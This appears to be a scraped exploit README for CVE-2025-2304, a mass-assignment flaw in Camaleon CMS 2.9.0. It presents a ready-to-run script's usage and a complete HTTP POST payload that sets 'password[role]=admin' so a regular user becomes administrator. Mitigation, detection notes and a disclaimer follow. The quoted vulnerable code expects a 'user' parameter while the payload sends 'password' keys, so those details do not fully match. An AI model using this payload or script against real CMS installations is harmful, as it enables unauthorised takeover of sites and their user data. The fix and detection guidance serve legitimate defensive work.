## https://sploitus.com/exploit?id=C43733FF-2755-5918-885F-BAE1D47C3BD3
# CVE-2025-2304 - Camaleon CMS 2.9.0 - Privilege Escalation Exploit
## Overview
This Python script exploits a critical mass assignment vulnerability in Camaleon CMS version 2.9.0, allowing any registered user to escalate their privileges to administrator.
## Vulnerability Details
- **CVE**: CVE-2025-2304 - Mass Assignment in UsersController#updated_ajax
- **Affected Version**: Camaleon CMS 2.9.0
- **Severity**: Critical
- **Vector**: The `permit!` method in the `updated_ajax` action allows all parameters to pass through without filtering, including the `role` parameter
## How the Exploit Works
1. **Authentication**: The script first logs in as a regular registered user
2. **Exploitation**: It sends a POST request to `/admin/users/[id]/updated_ajax` with a malicious payload: (In the script I used id 5 as this is usually the one assigned automatically. It might need to be changed.)
- `password[role]=admin` - This parameter should be filtered, but isn't due to `permit!`
- `password[password]` and `password[password_confirmation]` - Updates the user's password (When a regular user with a client role updates their profile, it is technically `user[role]=client`, but because we are exploiting here the vulnerability resulting from the `change password` functionality, it will be `password[role]=admin`.)
3. **Privilege Escalation**: The user's role is changed from regular user to administrator
4. **Verification**: The script attempts to access admin-only endpoints to confirm success
## Installation
```bash
pip install -r requirements.txt
```
## Usage
```bash
python camaleon_cms_privilege_escalation.py --url http://target-cms.com --username regularuser --password userpassword
```
### Optional Parameters
- `--new-password`: Set a new password during exploitation (defaults to current password)
### Example
```bash
python camaleon_cms_privilege_escalation.py \
--url http://192.168.1.100 \
--username testuser \
--password testpass123 \
--new-password newadminpass
```
## Technical Details
### Vulnerable Code Location
The vulnerability exists in the UsersController `updated_ajax` method:
```ruby
def updated_ajax
# Vulnerable code - uses permit! instead of specific parameter filtering
@user.update(params.require(:user).permit!)
# This allows ANY parameter to be mass-assigned, including role
end
```
### Malicious Payload
```http
POST /admin/users/[id]/updated_ajax
Content-Type: application/x-www-form-urlencoded
password[password]=newpass123&password[password_confirmation]=newpass123&password[role]=admin&_method=patch
```
### Expected Response
```json
{
"success": true,
"message": "User updated successfully"
}
```
## Impact
- **Privilege Escalation**: Regular users can gain administrator access
- **Full System Compromise**: Admin access allows complete control over the CMS
- **Data Breach**: Access to all user data and content
- **Persistence**: Ability to create backdoors and maintain access
## Mitigation
### For Developers
Replace the vulnerable `permit!` method with explicit parameter filtering:
```ruby
def updated_ajax
@user.update(params.require(:user).permit(:password, :password_confirmation, :email))
# Explicitly exclude: role parameter
end
```
### For System Administrators
1. Upgrade to a patched version of Camaleon CMS (2.9.1)
2. Implement role-based access controls
3. Add input validation and parameter filtering
4. Monitor for suspicious privilege escalation attempts
## Legal Disclaimer
This script is for educational and authorised security testing purposes only. Please don't use this exploit on systems you do not own or have explicit permission to test. The author is not responsible for any misuse or damage caused by this tool.
## Detection
Security teams can detect exploitation attempts by monitoring for:
- POST requests to `/admin/users/[id]/updated_ajax` with `password[role]` parameter
- Unexpected role changes in user accounts
- Privilege escalation patterns in audit logs
## References
- Mass Assignment Vulnerability Documentation
- Ruby on Rails Security Guidelines
- Camaleon CMS Security Advisories